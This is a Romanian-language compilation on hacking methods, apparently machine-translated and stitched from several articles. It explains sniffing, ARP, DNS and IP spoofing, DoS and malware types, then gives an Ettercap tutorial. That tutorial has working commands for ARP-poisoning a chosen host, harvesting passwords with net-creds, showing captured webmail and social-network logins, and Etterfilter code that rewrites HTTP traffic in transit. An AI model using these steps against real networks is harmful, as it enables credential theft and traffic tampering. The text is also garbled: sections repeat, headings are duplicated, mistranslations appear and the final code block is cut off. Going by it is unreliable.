Descrierea oricăror întrebări despre securitatea informatiei nu este posibil fără o descriere a hackerilor și a metodelor lor de lucru. Termenul „hacker” este folosit pentru a desemna o persoană care sparge computerele.

Hackerii sunt oameni cunoscători, cunoscători din punct de vedere tehnic, care au o înțelegere clară a modului în care funcționează computerele și rețelele și înțeleg cum sunt utilizate protocoalele pentru a efectua operațiunile sistemului. Motivația în munca hackerilor poate fi diferită, de la dorința de a atrage atenția asupra lor și la cea mai comună lăcomie.

Metode moderne de atacuri ale hackerilor

Multe atacuri moderne sunt efectuate prin așa-numita metodă „script kiddies”. Atacatorii caută pur și simplu pe Internet scripturi de exploatare și le rulează împotriva fiecărui sistem pe care îl pot găsi. Date moduri simple atacurile nu necesită cunoștințe sau instrucțiuni speciale.

Cu toate acestea, există și alte metode bazate pe o înțelegere mai profundă a funcționării computerelor, rețelelor și sistemelor atacate. În acest articol, vom descrie astfel de metode.

Ascultarea rețelelor

Listening, sau sniffing (sniffing) - o metodă folosită de hackeri/crackeri pentru a colecta parole și alte informații de sistem. Pentru a funcționa, interfața de rețea a computerului este setată să asculte traficul mixt (mod promiscuu), adică adaptorul de rețea va intercepta toate pachetele care se deplasează prin rețea și nu doar pachetele adresate acestui adaptor. Acest tip de sniffer funcționează bine pe rețelele partajate. debitului cu concentratoare de rețea – hub-uri.

Acum, găsirea unui concentrator este o problemă foarte mare - sunt utilizate în principal comutatoare de rețea, respectiv, eficiența adulmecării a început să scadă. Într-un mediu comutat, modul de difuzare nu este utilizat; în schimb, pachetele sunt trimise direct către sistemul de recepție. Cu toate acestea, întrerupătoarele nu sunt dispozitive de siguranță. Acestea sunt dispozitive de rețea obișnuite, așa că securitatea pe care o oferă este mai mult un produs secundar al scopului lor de rețea decât un element de design. Există, de asemenea, un sniffer special conceput pentru un mediu comutat

Pentru a asculta traficul într-un mediu comutat, trebuie îndeplinită una dintre următoarele condiții:
„convingeți” comutatorul că traficul de interes ar trebui direcționat către sniffer;
forțați comutatorul să trimită tot traficul către toate porturile.

Dacă una dintre condiții este îndeplinită, snifferul va putea citi traficul de interes și, astfel, să ofere hackerului informațiile necesare.

Redirecționarea traficului

Comutatorul direcționează traficul către porturi pe baza adresei Media Access Control (MAC) pentru cadrul care este trimis prin intermediul Rețele Ethernet. Fiecare interfață de rețea are o adresă MAC unică, iar comutatorul „știe” ce adrese sunt pe ce port. Prin urmare, atunci când transmite un cadru cu o anumită adresă MAC de destinație, comutatorul redirecționează acest cadru către portul către care adresa MAC dată.

Următoarele sunt metode prin care puteți forța comutatorul să direcționeze traficul de rețea către sniffer:
Falsificarea ARP
duplicarea adreselor MAC;
imitarea numelui de domeniu.

ARP-spoofing (ARP-spoofing). ARP este un protocol de rezoluție de adrese utilizat pentru a obține adresa MAC asociată cu o anumită adresă IP. Funcționează astfel: la transmiterea traficului, sistemul de trimitere trimite o solicitare ARP la adresa IP a destinatarului. Sistemul receptor răspunde la această solicitare prin transmiterea adresei sale MAC, care va fi folosită de sistemul expeditor pentru a redirecționa traficul.

Dacă sniffer-ul captează traficul care îl interesează, acesta va răspunde la cererea ARP în loc de sistemul de recepție real și va furniza propria sa adresă MAC. Drept urmare, sistemul de trimitere va trimite trafic către sniffer.

Pentru ca acest proces să fie eficient, tot traficul trebuie redirecționat către sniffer în loc de destinația reală. Dacă acest lucru nu se face, atunci va exista posibilitatea de a refuza accesul la rețea. Adaug..

Falsificarea ARP funcționează numai pe subrețele (un singur segment de rețea), deoarece mesajele ARP nu sunt direcționate. Snifferul trebuie plasat în același segment retea locala, unde se află sistemele emițător și receptor.

Adrese MAC duplicate. Dublarea adresei MAC a sistemului de destinație este o altă modalitate de a „convinge” comutatorul să trimită trafic către sniffer. Pentru a face acest lucru, hackerul trebuie să schimbe adresa MAC pe sniffer și să fie localizat pe același segment de rețea locală.
Voi adăuga din nou.

Pentru a efectua spoofing ARP, sniffer-ul trebuie să fie pe aceeași subrețea locală ca ambele sisteme (emițător și receptor) pentru a putea duplica adresele MAC.

Imitarea numelui de domeniu. Există o a treia modalitate de a forța comutatorul să trimită tot traficul către sniffer: trebuie să „păcăliți” sistemul de trimitere să folosească adresa MAC reală a sniffer-ului pentru transmiterea datelor. Acest lucru se face prin imitarea unui nume de domeniu.

În acest atac, snifferul interceptează cererile DNS de la sistemul de trimitere și le răspunde. În loc de adresa IP a sistemelor către care a fost trimisă cererea, sistemul de trimitere primește adresa IP a sniffer-ului și îi trimite tot traficul. Apoi, sniffer-ul trebuie să redirecționeze acest trafic către destinatarul real. Vedem că în acest caz atacul de falsificare a numelui de domeniu se transformă într-un atac de deturnare.

Pentru a asigura succesul acestui atac, snifferul trebuie să se uite la toate interogările DNS și să le răspundă înainte ca destinatarul real să o facă. Prin urmare, sniffer-ul trebuie să fie amplasat pe ruta de trafic de la sistemul expeditor către serverul DNS, sau chiar mai bine, pe aceeași subrețea locală cu expeditorul.

Un sniffer ar putea vizualiza cererile trimise prin Internet, dar cu cât este mai departe de sistemul de trimitere, cu atât este mai dificil să se asigure că este primul care le răspunde.

Trimiterea întregului trafic către toate porturile

În loc de toate cele de mai sus, un hacker poate face ca comutatorul să funcționeze ca un hub (concentrator). Fiecare comutator folosește o anumită cantitate de memorie pentru a stoca un tabel de corespondențe între adresa MAC și portul fizic intrerupator. Această memorie este limitată. Dacă depășește, unele comutatoare pot raporta în mod eronat o stare „deschisă”. Aceasta înseamnă că comutatorul va opri trimiterea de trafic către anumite adrese MAC și va începe să redirecționeze tot traficul către toate porturile. Ca rezultat, comutatorul va funcționa ca un hub (hub).

Efectuarea de atacuri

Acum să ne uităm la ce este necesar pentru a efectua atacurile de mai sus. În cazul falsificării ARP, duplicarea adresei MAC sau inundarea MAC, trebuie să vă conectați direct la comutatorul atacat. O astfel de conexiune este necesară și pentru a imita un nume de domeniu.

Concluzie - hackerul trebuie să instaleze sistemul pe comutatorul local. Pentru a face acest lucru, el se conectează în sistem printr-o vulnerabilitate cunoscută și instalează software-ul necesar pentru sniffing. Într-o altă versiune, hackerul este deja în interiorul organizației (el este angajatul sau contractantul acesteia). În acest caz, el își folosește accesul legitim la rețeaua locală, ceea ce îi permite să contacteze comutatorul.

Falsificarea adresei IP

După cum sa menționat deja, corectitudinea adreselor IP din pachetele transmise prin rețea nu este verificată. Prin urmare, un hacker poate schimba adresa expeditorului, astfel încât să pară că pachetul provine de la orice adresă. Dificultatea este că pachetele returnate (pachetele SYN ACK pe o conexiune TCP) nu vor putea reveni la sistemul de trimitere. Prin urmare, încercarea de falsificare a unei adrese IP (IP spoofing) pentru a stabili o conexiune TCP este foarte dificilă. În plus, antetul TCP conține un număr de secvență folosit pentru a confirma primirea pachetului. Numărul de secvență inițial (ISN) pentru fiecare nouă conexiune este ales pseudo-aleatoriu.

Detalii despre atacul IP Spoof

Figura arată execuția unui atac de falsificare a adresei IP. 1 - identificarea țintei. 2. - determinarea valorii incrementului numărului de ordine inițial (ISN). Acest lucru se poate face făcând o serie de conexiuni legitime la sistemul țintă și notând ISN-urile returnate (făcând acest lucru, hackerul riscă să-și expună adresa IP reală). Îmi pare rău, cu desenul nu merge, deși mă învârt încoace și în altul! Mănânc mai tare decât mine...

Acestea sunt de obicei trimise către serverele de informații ale întreprinderii, a căror funcționare este o condiție critică pentru performanța întregii întreprinderi. Cel mai adesea, obiectele atacurilor DOS sunt principalele servere web, servere de fișiere și e-mail ale întreprinderii, precum și serverele rădăcină ale sistemului DNS.

Răspunsuri DNS false.

Tipuri de atacuri. Interceptarea și redirecționarea traficului

Atacurile de tip Denial of Service (DoS).

Interceptarea și redirecționarea traficului. Scopul este de a direcționa traficul computerului atacat către o adresă falsă, care poate fi adresa unui atacator sau a unei terțe părți.

Răspunsuri DNS false.

Tipuri de atacuri. FalsDNSrăspunsuri

Atacurile de tip Denial of Service (DoS).

Interceptarea și redirecționarea traficului.

Răspunsuri DNS false. Sarcina atacatorului este să obțină acces la serverul corporativ. Pentru a face acest lucru, el trebuie să intre în posesia numelui și a parolei utilizatorului autorizat. rețeaua corporativă. El decide să obțină aceste informații prin ramificarea fluxului de date pe care clientul corporativ îl trimite către serverul corporativ.

Implementarea malware. troieni

Troienii, sau troienii, sunt un tip de malware care dăunează unui sistem deghându-se într-un fel de aplicație utilă.

Troienii pot folosi ca acoperire aplicații familiare utilizatorului, cu care a lucrat înainte, înainte de apariția „calului troian” în computer.

Introducerea programelor malware. Viermi

Viermii de rețea (worms) sunt programe capabile să-și distribuie în mod independent copiile între nodurile dintr-o rețea locală, precum și prin conexiuni globale, trecând de la un computer la altul fără nicio participare a utilizatorilor rețelei la acest proces.

Viermele este format din două componente funcționale principale: un bloc de atac și un bloc de căutare țintă.

Un bloc de atac este format din mai multe module (vectori de atac), fiecare dintre ele proiectat pentru a învinge un anumit tip de vulnerabilitate. Acest bloc deschide „ușa din față” a gazdei atacate și transmite o copie a lui însuși prin el.

Blocul de căutare țintă (locator) colectează informații despre nodurile rețelei, iar apoi, pe baza acestor informații, determină care dintre nodurile studiate au acele vulnerabilități pentru care hackerul are mijloacele de atac.

Introducerea programelor malware. Viruși

Un virus este o bucată de software rău intenționat care poate infecta alte fișiere.

Spre deosebire de viermi, virușii (precum și troienii) nu conțin un mecanism încorporat de propagare activă în rețea; ei se pot multiplica singuri doar într-un singur computer. De regulă, transferul unei copii a virusului pe un alt computer are loc cu participarea utilizatorului.

Ascultarea rețelelor comutate

Învățarea metodelor moderne

Multe atacuri moderne sunt efectuate de așa-numiții „copii script”. Aceștia sunt utilizatori care caută scripturi de exploatare pe Internet și le execută pe fiecare sistem pe care îl pot găsi. Aceste metode simple de atac nu necesită cunoștințe sau instrucțiuni speciale.

Cu toate acestea, există și alte metode bazate pe o înțelegere mai profundă a funcționării computerelor, rețelelor și sistemelor atacate. ÎN aceasta sectiune ne vom familiariza cu astfel de metode - cu ascultarea (sniffing, din engleză sniffing) a rețelelor comutate și imitarea unei adrese IP (IP-spoofing).

Ascultarea sau adulmecarea este folosită de hackeri/crackeri după piratarea unui sistem pentru a colecta parole și alte informații de sistem. Pentru a face acest lucru, sniffer-ul setează placa de interfață de rețea să asculte traficul mixt (mod promiscuu), adică adaptorul de rețea va intercepta toate pachetele care se deplasează prin rețea și nu doar pachetele adresate acestui adaptor sau sistem. Acest tip de sniffer funcționează bine în rețelele partajate cu lățime de bandă cu hub-uri de rețea.

Pe măsură ce comutatoarele de rețea sunt folosite mai mult acum, eficiența sniffing-ului a început să scadă. Într-un mediu comutat, modul de difuzare nu este utilizat; în schimb, pachetele sunt trimise direct către sistemul de recepție. Cu toate acestea, întrerupătoarele nu sunt dispozitive de siguranță. Acestea sunt dispozitive de rețea obișnuite, așa că securitatea pe care o oferă este mai mult un produs secundar al scopului lor de rețea decât un element de design. Prin urmare, apariția unui sniffer capabil să lucreze într-un mediu comutat este destul de posibilă. Și deja s-a întâmplat. Un sniffer special conceput pentru un mediu comutat poate fi găsit la http://ettercap.sourceforge.net/.

Pentru a asculta traficul într-un mediu comutat, un hacker trebuie să îndeplinească una dintre următoarele condiții:

• „convingeți” comutatorul că traficul de interes ar trebui direcționat către sniffer;
• forțați comutatorul să trimită tot traficul către toate porturile.

Dacă una dintre condiții este îndeplinită, snifferul va putea citi traficul de interes și, astfel, să ofere hackerului informațiile necesare.

Comutatorul direcționează traficul către porturi pe baza adresei Media Access Control (MAC) pentru cadrul din rețeaua Ethernet. Fiecare placă de interfață de rețea are o adresă MAC unică, iar comutatorul „știe” ce adrese sunt alocate carei port. Prin urmare, atunci când transmite un cadru cu o anumită adresă MAC de destinație, comutatorul redirecționează cadrul către portul căruia îi este atribuită adresa MAC dată.

Următoarele sunt metode prin care puteți forța comutatorul să direcționeze traficul de rețea către sniffer:

• Falsificarea ARP
• duplicarea adreselor MAC;
• imitarea numelui de domeniu.

Falsificarea ARP(ARP spoofing). ARP este un protocol de rezoluție de adrese utilizat pentru a obține adresa MAC asociată cu o anumită adresă IP. La transmiterea traficului, sistemul de trimitere trimite o solicitare ARP la adresa IP de destinație. Sistemul receptor răspunde la această solicitare prin transmiterea adresei sale MAC, care va fi folosită de sistemul expeditor pentru a redirecționa traficul.

Dacă sniffer-ul captează traficul care îl interesează, acesta va răspunde la cererea ARP în loc de sistemul de recepție real și va furniza propria sa adresă MAC. Drept urmare, sistemul de trimitere va trimite trafic către sniffer.

Pentru ca acest proces să fie eficient, tot traficul trebuie redirecționat către sniffer în loc de destinația reală. Dacă acest lucru nu se face, atunci va exista posibilitatea de a refuza accesul la rețea.

Notă

Falsificarea ARP funcționează numai pe subrețelele locale, deoarece mesajele ARP sunt trimise numai în subrețelele locale. Sniffer-ul trebuie să fie amplasat pe același segment LAN ca și sistemele emițător și receptor.

Adrese MAC duplicate. Dublarea adresei MAC a sistemului de destinație este o altă modalitate de a „convinge” comutatorul să trimită trafic către sniffer. Pentru a face acest lucru, hackerul trebuie să schimbe adresa MAC pe sniffer și să fie localizat pe un sistem care se află pe același segment LAN.

Notă

Se consideră că este imposibil să se schimbe adresele MAC. Cu toate acestea, acesta nu este deloc cazul. Acest lucru se poate face în sistem Unix folosind comanda ipconfig. Utilități similare sunt disponibile în sistemul Windows.

Pentru a efectua spoofing ARP, sniffer-ul trebuie să fie pe aceeași subrețea locală ca ambele sisteme (emițător și receptor) pentru a putea duplica adresele MAC.

Imitarea numelui de domeniu. Există o a treia modalitate de a forța comutatorul să trimită tot traficul către sniffer: trebuie să „păcăliți” sistemul de trimitere să folosească adresa MAC reală a sniffer-ului pentru transmiterea datelor. Acest lucru se face prin imitarea unui nume de domeniu.

În acest atac, snifferul interceptează cererile DNS de la sistemul de trimitere și le răspunde. În loc de adresa IP a sistemelor către care a fost trimisă cererea, sistemul de trimitere primește adresa IP a sniffer-ului și îi trimite tot traficul. Apoi, sniffer-ul trebuie să redirecționeze acest trafic către destinatarul real. Vedem că în acest caz atacul de falsificare a numelui de domeniu se transformă într-un atac de deturnare.

Pentru a asigura succesul acestui atac, snifferul trebuie să se uite la toate interogările DNS și să le răspundă înainte ca destinatarul real să o facă. Prin urmare, sniffer-ul trebuie să fie amplasat pe traseul traficului de la sistemul de trimitere la serverul DNS, și chiar mai bine, pe aceeași subrețea locală ca și expeditorul.

Notă

Un sniffer ar putea vizualiza cererile trimise prin Internet, dar cu cât este mai departe de sistemul de trimitere, cu atât este mai dificil să se asigure că este primul care le răspunde.

Interceptarea datelor prin rețea este considerată a fi primirea oricărei informații de la un dispozitiv computerizat la distanță. Poate consta din informațiile personale ale utilizatorului, mesajele acestuia, înregistrările vizitelor site-urilor web. Captarea datelor poate fi efectuată cu ajutorul programelor spion sau folosind sniffer de rețea.

Spyware este un software special care poate înregistra toate informațiile transmise printr-o rețea cu un anumit stație de lucru sau dispozitive.

Un sniffer este un program sau echipamente informatice, care interceptează și analizează traficul care trece prin rețea. Sniffer-ul vă permite să vă conectați la o sesiune web și să efectuați diverse operațiuni în numele proprietarului computerului.

Dacă informațiile nu sunt transmise în timp real, programele spion generează rapoarte care sunt convenabile pentru vizualizarea și analizarea informațiilor.

Ascultările în rețea pot fi organizate în mod legal sau efectuate ilegal. Principalul document care stabilește legalitatea achiziției de informații este Convenția privind criminalitatea cibernetică. A fost fondată în Ungaria în 2001. Cerințele legale ale diferitelor state pot varia oarecum, dar semnificația cheie este aceeași pentru toate țările.

Clasificare și metode de interceptare a datelor prin rețea

În conformitate cu cele de mai sus, interceptarea informațiilor prin rețea poate fi împărțită în două tipuri: autorizată și neautorizată.

Captarea autorizată a datelor se realizează în diverse scopuri, de la protejarea informațiilor corporative până la asigurarea securității statului. Motivele efectuării unei astfel de operațiuni sunt stabilite de lege, serviciile speciale, oamenii legii, specialiștii din organizațiile administrative și serviciile de securitate ale companiei.

Exista standarde internaționale efectuarea interceptării datelor. Institutul European de Standarde de Telecomunicații a reușit să aducă la un singur standard o serie de procese tehnice (ETSI ES 201 158 „Securitatea telecomunicațiilor; Interceptarea legală (LI); Cerințe pentru funcțiile de rețea”), pe care se bazează interceptarea informațiilor. Ca urmare, a fost dezvoltată o arhitectură de sistem care ajută specialiștii serviciilor secrete, administratorii de rețea să preia legal datele din rețea. Structura dezvoltată pentru implementarea interceptării datelor în rețea se aplică sistemelor de apeluri vocale cu fir și fără fir, precum și corespondenței prin poștă, mesajelor vocale prin IP și schimbului de informații prin SMS.

Interceptarea neautorizată a datelor prin rețea este efectuată de intrușii care doresc să intre în posesia datelor confidențiale, parole, secrete corporative, adrese ale computerelor din rețea etc. Pentru a-și atinge obiectivele, hackerii folosesc de obicei un analizor de trafic de rețea - un sniffer. Acest program sau dispozitiv de tip hardware-software oferă unui fraudator capacitatea de a intercepta și analiza informațiile din rețeaua la care utilizatorul victimă este conectat, inclusiv traficul SSL criptat prin înlocuirea certificatelor. Datele de trafic pot fi capturate în diferite moduri:

• ascultare pe interfața de rețea,
• conectarea unui interceptor la o întrerupere a canalului,
• crearea unei ramuri de trafic și duplicarea acesteia pe un sniffer,
• prin efectuarea unui atac.

Există, de asemenea, tehnologii mai sofisticate pentru interceptarea informațiilor sensibile care permit intervenția în interacțiunea rețelei și modificarea datelor. O astfel de tehnică este cererile ARP false. Esența metodei este falsificarea adreselor IP între computerul victimei și dispozitivul atacatorului. O altă metodă care poate fi folosită pentru a intercepta date prin rețea este rutarea capcanei. Constă în înlocuirea adresei IP a routerului de rețea cu adresa proprie. Dacă un criminal cibernetic știe cum este organizată rețeaua locală în care se află victima, atunci el poate organiza cu ușurință primirea informațiilor de la aparatul utilizatorului la adresa sa IP. Capturarea unei conexiuni TCP este, de asemenea, o modalitate eficientă de interceptare a datelor. Un atacator întrerupe o sesiune de comunicare generând și trimițând pachete TCP către computerul victimei. Mai departe, sesiunea de comunicare este restabilită, interceptată și continuată de infractor în locul clientului.

Obiect de influență

Obiectele interceptării datelor prin rețea pot fi agenții guvernamentale, întreprinderi industriale, structuri comerciale, utilizatori obișnuiți. În interiorul unei organizații sau al unei companii de afaceri, captarea informațiilor poate fi implementată pentru a proteja infrastructura rețelei. Serviciile speciale și agențiile de aplicare a legii pot efectua interceptări în masă a informațiilor transmise de la diferiți proprietari, în funcție de sarcină.

Dacă vorbim de infractorii cibernetici, atunci orice utilizator sau organizație poate deveni obiect de influență pentru a obține date transmise prin rețea. Cu acces autorizat, partea informativă a informațiilor obținute este importantă, în timp ce atacatorul este mai interesat de datele cu care să intre în posesie. în numerar sau informații valoroase pentru vânzarea sa ulterioară.

Cel mai adesea, utilizatorii care se conectează la o rețea publică, de exemplu, într-o cafenea cu un hotspot Wi-Fi, devin victime ale interceptării informațiilor de către infractorii cibernetici. Un atacator se conectează la o sesiune web folosind un sniffer, înlocuiește datele și fură informații personale. Mai multe detalii despre cum se întâmplă acest lucru sunt descrise în articol.

Sursa amenințării

Interceptarea autorizată a informațiilor în companii și organizații este efectuată de operatorii de infrastructură de rețea publică. Activitățile lor au ca scop protejarea datelor cu caracter personal, a secretelor comerciale și altele Informații importante. Din motive legale, transferul de mesaje și fișiere poate fi monitorizat de serviciile speciale, agențiile de aplicare a legii și diferite agenții guvernamentale pentru a asigura siguranța cetățenilor și a statului.

Atacatorii sunt implicați în interceptarea ilegală a datelor. Pentru a nu deveni victima unui criminal cibernetic, trebuie să urmați câteva recomandări de la experți. De exemplu, nu trebuie să efectuați operațiuni care necesită autorizare și transfer de date sensibile în locurile în care se realizează conexiunea la rețele publice. Este mai sigur să alegeți rețele criptate și chiar mai bine să folosiți modemuri personale 3G și LTE. Când transferați date personale, se recomandă să le criptați folosind protocolul HTTPS sau un tunel VPN personal.

Vă puteți proteja computerul de interceptarea traficului de rețea folosind criptografie, anti-sniffer; va reduce mai degrabă riscurile de dial-up decât acces wireless la rețea.

Alternative Ettercap

Ettercap este cel mai popular program de atac man-in-the-middle, dar este cel mai bun? Pe parcursul întregului manual, veți vedea că Ettercap nu este aproape niciodată folosit singur, că unul sau altul program este întotdeauna aliniat cu el într-un lanț de procesare a traficului. Poate că acest lucru adaugă flexibilitate, în general, această abordare este în centrul UNIX - un program îndeplinește o sarcină, iar utilizatorul final combină diverse programe pentru a obține rezultatul dorit. Cu această abordare, codul programului este mai ușor de întreținut; astfel de „cărămizi” în miniatură pot fi folosite pentru a construi un sistem de orice complexitate și flexibilitate. Cu toate acestea, a avea cinci console deschise cu sarcini diferite, a căror activitate de programe vizează obținerea unui singur rezultat, nu este foarte convenabil, este doar mai dificil, există șansa de a face o greșeală la un moment dat și întregul configurat. sistemul va inactiv.

Net-Creds adulmecă:

• Adrese URL vizitate
• a trimis cereri POST
• autentificări/parole din formularele HTTP
• autentificare/parole pentru autentificarea HTTP de bază
• Căutări HTTP
• Autentificare/parole FTP
• Login-uri/parole IRC
• Login-uri/parole POP
• Autentificare/parole IMAP
• Autentificare/parole Telnet
• Autentificare/parole SMTP
• Șirul comunității SNMP
• toate protocoalele NTLMv1/v2 acceptate, cum ar fi HTTP, SMB, LDAP etc.
• Kerberos

O selecție bună de imagini interceptate și driftnet este mai simplă în acest sens - arată doar imagini interceptate.

Comutați aparatul în modul de redirecționare.

echo "1" > /proc/sys/net/ipv4/ip_forward

Începem Ettercap cu o interfață grafică ( -G):

Ettercap-G

Acum alege gazde, are un subparagraf Scanați pentru gazde. După finalizarea scanării, selectați lista gazdelor:

La fel de Obiective 1 selectați routerul ( Adăugați la ținta 1), la fel de Obiective 2 selectați dispozitivul pe care doriți să îl atacați ( Adăugați la ținta 2).

Dar aici poate apărea prima problemă, mai ales dacă sunt multe gazde. ÎN instrucțiuni diferite, inclusiv în videoclipul prezentat mai sus, autorii se urcă în mașina țintă (din anumite motive, toată lumea are Windows acolo) și folosesc comanda pentru a se uita la IP-ul acestei mașini în rețeaua locală. De acord, această opțiune este inacceptabilă în condiții reale.

Dacă scanați cu, atunci puteți obține câteva informații suplimentare despre gazde, mai precis, despre producătorul plăcii de rețea:

nmap -sn 192.168.1.0/24

Dacă datele încă nu sunt suficiente, atunci puteți face o scanare cu definiția sistemului de operare:

nmap -O 192.168.1.0/24

După cum puteți vedea, mașina cu IP 192.168.1.33 s-a dovedit a fi Windows, dacă acesta nu este un semn de sus, atunci ce este? 😉 lol

Acesta este ceea ce adăugăm ca al doilea obiectiv.

Acum să trecem la elementul de meniu. Mitm. Acolo selectează Intoxicatia cu ARP... Bifeaza casuta Adulmecă conexiunile de la distanță.

Începem recoltarea, într-o fereastră lansăm

Credite nete

în altul (ambele programe pot fi rulate fără opțiuni)

plasă de pescuit

Colectarea datelor a început imediat.

În partea dreaptă, driftnet a deschis o altă fereastră care arată imaginile capturate. În fereastra net-creds, vedem site-uri vizitate și parole interceptate:

1.2 Ettercap + Burp Suite

3. Vizualizați datele (site-urile web vizitate și parolele capturate) în Ettercap

În meniu vedere avem file disponibile ConexiuniȘi Profiluri. De asemenea, puteți bifa caseta Rezolvați adresele IP(traduceți adrese IP). Conexiunile sunt, desigur, conexiuni. Ettercap colectează profiluri în memorie pentru fiecare gazdă pe care o descoperă. Utilizatorii și parolele sunt colectate acolo. În acest caz, profilurile cu date de cont capturate (parole) sunt marcate cu o cruce:

Nu vă bazați prea mult pe profiluri - de exemplu, login-urile și parolele interceptate pentru FTP și alte servicii sunt marcate, pentru care programul poate interpreta fără echivoc informațiile primite ca acreditări. Aceasta nu include, de exemplu, datele de autentificare de bază, datele de conectare și parolele introduse în formularele web.

În Connections, cele mai promițătoare date sunt marcate cu un asterisc:

Puteți face dublu clic pe aceste intrări pentru a vedea detaliile:

Pentru a nu căuta aceste stele în întreaga listă, puteți sorta după acest câmp și toate vor fi în partea de sus sau de jos:

Autentificare de bază prinsă:

Parola de conectare pentru Yandex (evidențiată mai jos):

Acestea sunt acreditările interceptate pentru Vkontakte:

De asemenea, cele mai interesante date sunt colectate în consola inferioară:

Dacă doriți să salvați rezultatele programului, atunci utilizați aceste opțiuni (specificați cheile când porniți Ettercap:

Opțiuni de înregistrare: -w, --write<файл>scrieți datele capturate în pcapfile<файл>-L, --log<логфайл>scrie tot traficul la asta<логфайл>-l, --log informații<логфайл>scrie doar informații pasive la aceasta<логфайл>-m, --log-msg<логфайл>scrie toate mesajele la aceasta<логфайл>-c, --compress folosește compresia gzip pentru fișierele jurnal

4. Înlocuirea datelor din mers în Ettercap

4.1 Utilizarea filtrelor Ettercap personalizate

Notă: În toate testele mele, filtrele Ettercap nu au funcționat. Este greu de înțeles dacă este în mâini, în caracteristicile hardware sau într-un bug în programul în sine... Dar pentru versiunea 0.8.2 (cea mai recentă în acest moment), există un raport de eroare despre problemele cu filtrele. În general, judecând după rapoartele de erori și forumurile, filtrele fie căd des, fie nu funcționează deloc pentru o lungă perioadă de timp. Există o ramură care a fost modificată acum 5 luni https://github.com/Ettercap/ettercap/tree/filter-improvements, adică. filtru-îmbunătățiri (cu îmbunătățiri ale filtrului). S-au făcut o mare varietate de teste pentru această ramură și pentru versiunea din depozit au fost testate diverse filtre în diferite condiții, s-a cheltuit mult timp, dar nu a existat niciun rezultat. Apropo, pentru a seta versiunea de filtru-îmbunătățiri la Kali Linux trebuie sa faci asta:

sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses15-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DO =On ../ make sudo make install

În general, dacă filtrele tale nu funcționează, atunci nu ești singur. În instrucțiunile pentru Ettercap, nu pot sări peste subiectul filtrelor, așa că vor fi luate în considerare oricum.

Până acum am folosit Ettercap pentru spoofing ARP. Aceasta este o aplicație foarte superficială. Datorită filtrelor personalizate, putem interveni și schimba traficul din mers. Filtrele ar trebui să fie introduse fișiere separateși trebuie compilat cu programul Etterfilter înainte de utilizare. Deși documentația către care este dat linkul pare a fi scurtă, dar cuplată cu exemplele de mai jos, vă va permite să scrieți filtre destul de interesante.

Să creăm primul nostru filtru, acesta va înlocui toate imaginile cu acesta:

Într-un fișier numit img_replacer.filter copie:

Dacă (ip.proto == TCP && tcp.dst == 80) ( dacă (căutare(DATA.data, „Accept-Encoding”)) ( înlocuiți(„Accept-Encoding”, „Accept-Rubish!”); # notă: șirul de înlocuire are aceeași lungime ca și mesajul original ("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( înlocuiți("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); înlocuiți("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); înlocuiți("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); înlocuiți("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Run.\n"); )

Compilați fișierul:

Etterfilter img_replacer.filter -o img_replacer.ef

Rezultatele compilației:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 tabele de protocol încărcate: DATE DECODIFICATE udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 constante încărcate: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP Fișier sursă PPTP ARPPOE Paring „img_replacer.filter” terminat. Desfășurarea meta-arborelui s-a terminat. Conversia etichetelor în decalaje reale a fost finalizată. S-a terminat scrierea ieșirii în „img_replacer.ef”. -> Script codificat în 18 instrucțiuni.

Cheie -F spune programului să încarce filtrul din fișierul care urmează cheii. După compilare, numele noului nostru fișier cu filtrul este img_replacer.ef, deci comanda devine:

Ettercap -G -F img_replacer.ef

Notă R: Când monitorizați traficul web, pachetele pe care le vedeți pot fi în formă codificată. Pentru munca eficienta filtre, Ettercap are nevoie de trafic text simplu. Conform unor observații, tipul de codificare pe care îl folosesc paginile web este „Accept-Encoding: gzip, deflate”

Mai jos este un filtru care suprascrie codificarea, forțând comunicarea sub formă de text simplu:

Dacă (ip.proto == TCP && tcp.dst == 80) ( dacă (căutare(DATA.data, "gzip")) ( înlocuiți ("gzip", " "); # notă: patru spații în șirul de mesaje pentru înlocuiți ("gzip albit\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( dacă (căutare(DATA.data, "deflate")) ( înlocuiți ("deflate", " "); # notă: șapte spații în șirul de înlocuire msg("dezumflare albită\n"); ) )

Sintaxa pentru scrierea filtrelor este descrisă în detaliu, iar apoi alte câteva exemple:

# înlocuiți textul din pachet: if (ip.proto == TCP && search(DATA.data, "lol"))( replace ("lol", "smh"); msg("filter run"); ) # afișați mesajul , dacă portul tcp este 22 dacă (ip.proto == TCP) ( dacă (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # înregistrați tot traficul telnet, executați de asemenea ./program per pachet dacă (ip.proto == TCP) ( dacă (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log"); exec ( ""./program"); ​​​​) ) # înregistrează tot traficul, cu excepția http dacă (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( jurnal(DATA.data, ". / logfile.log"); ) # unele operațiuni de încărcare utilă de pachete if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "modificat"; DATA.data + 20 = 0x4445; ) # aruncați toate pachetele care conțin „ettercap” if (search(DECODED.data, „ettercap”)) ( msg(„cineva vorbește despre noi...\n”); drop(); kill(); ) # scrieți pachete ssh decriptate care corespund regex if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ". *login.*) ")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # distrugerea pachetelor dacă (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && 